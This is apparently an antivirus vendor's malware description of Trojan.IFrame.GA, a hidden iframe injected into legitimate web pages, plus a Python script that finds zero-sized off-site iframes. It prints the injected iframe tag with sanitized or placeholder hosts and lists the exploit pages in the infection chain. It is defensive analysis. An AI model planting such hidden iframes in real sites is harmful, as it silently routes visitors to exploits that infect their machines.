Trojan.IFrame.GA

SYMPTOMS: It currently leads to a Rootkit.Agent.AIWN infection.

TECHNICAL DESCRIPTION: Detects a type of malicious iframe injected into legitimate web pages. The iframe tag looks like:

<iframe src=http://sanitized/fxx.htm width=100 height=0>

I'll base this description on a valid site (many of them were sanitized or taken down): hxxp://www.*******.cn/a114/fxx.htm (please don't access that page in your browser unless you know what you're doing).

The fxx.htm page contains only a SCRIPT tag, and here the fun begins (with many iframes injected into the page):

* fx.htm - this one tries to exploit a vulnerability in FlashPlayer
* ../a1/ss.htm
* ../a1/MS06014.htm
* ../a1/sina.htm - if the Sina Downloader.DLoader.1 ActiveX Control is available
* ../a1/no.htm - if the UUUPGRADE.UUUpgradeCtrl.1 ActiveX Control is available
* ../a1/bfyy.htm - if the MPS.StormPlayer ActiveX Control is available
* ../a1/GLWORLD.html - for GLIEDown.IEDown.1
* ../a1/real.htm - for RealPlayer IERPCtl.IERPCtl.1, if RealPlayer's version is older than 6.0.14.552 (or it)
* ../a1/real.hTml - if RealPlayer's version is newer than 6.0.14.552

fx.htm is detected as Trojan.Exploit.ANPI and, depending on the browser, leads to Trojan.Exploit.SSX for browsers that have "msie" in their User-Agent, and to Trojan.JS.Redirector.E for the rest. This eventually leads to some Flash files detected as Exploit.SWF.Gen.

Removal instructions: Please let BitDefender disinfect your files.

ANALYZED BY: Alexandru Maximciuc, virus researcher
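The injected tag described above has two tell-tale properties: a zero height (or width) and a src on a host other than the page's own. The following is an added example (not BitDefender's detection code) that scans an HTML document for iframes with both properties; the sample page, the hostnames victim.example and malicious.invalid, and the function names are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one legitimate embed plus one injected hidden
# iframe of the shape described on this page (host replaced by a placeholder).
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="https://example.com/video" width="400" height="300"></iframe>
<iframe src=http://malicious.invalid/a114/fxx.htm width=100 height=0></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # attrs is a list of (name, value); value is None for bare attributes
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dimension(value):
    """Parse a width/height attribute ("0", "0px", ...) to an int; -1 if absent/unparsable."""
    digits = "".join(ch for ch in value if ch.isdigit())
    return int(digits) if digits else -1


def find_suspicious_iframes(html, page_host):
    """Return src values of iframes that are both hidden (zero width or height)
    and off-site (src host differs from page_host). Relative srcs count as on-site."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or page_host
        hidden = _dimension(attrs.get("width", "")) == 0 or _dimension(attrs.get("height", "")) == 0
        if hidden and host != page_host:
            hits.append(src)
    return hits


if __name__ == "__main__":
    for src in find_suspicious_iframes(SAMPLE_HTML, "victim.example"):
        print("hidden off-site iframe:", src)
```

Run it over a site's HTML files during incident response to locate pages carrying the injection; a zero-sized iframe pointing off-site is rarely legitimate and is worth manual review.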